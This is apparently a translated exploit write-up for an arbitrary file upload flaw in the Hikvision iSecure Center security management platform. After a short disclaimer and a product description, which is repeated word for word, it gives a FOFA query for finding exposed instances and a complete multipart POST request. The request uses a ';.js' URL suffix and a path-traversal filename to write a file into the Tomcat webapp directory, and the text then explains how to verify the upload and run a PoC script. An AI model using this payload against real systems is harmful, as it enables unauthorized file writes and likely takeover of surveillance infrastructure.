Hikvision isecure center comprehensive security management platform arbitrary file upload vulnerability
Disclaimer:
Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Brief introduction of Hikvision isecure center comprehensive security management platform
HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling.
2. Vulnerability description
HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling. Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability
CVE编号:
CNNVD编号:
CNVD编号:
Three, the impact version
HIKVISION iSecure Center integrated security management platform
Four, fofa query statement
app=“HIKVISION-iSecure-Center”
5. Vulnerability recurrence
Vulnerability link: https://127.0.0.1/clusterMgr/836424300.txt;.js vulnerability data package:
POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c
--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream
332299402
--ea26cdac4990498b32d7a95ce5a5135c--
The uploaded file is located at /clusterMgr/153107606.txt;.js Change 153107606 to the file name you uploaded in the data package above. successfully uploaded
6. POC&EXP
Usage: python3 .\vuln31.py https://127.0.0.1/ Remember to end with /.
7. Opinions on rectification
Please contact the manufacturer to find a solution: https://www.hikvision.com/cn/